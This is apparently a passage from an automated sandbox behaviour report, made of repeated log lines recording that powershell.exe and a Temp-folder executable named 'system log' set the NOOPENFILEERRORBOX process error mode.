                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess information set: NOOPENFILEERRORBOX
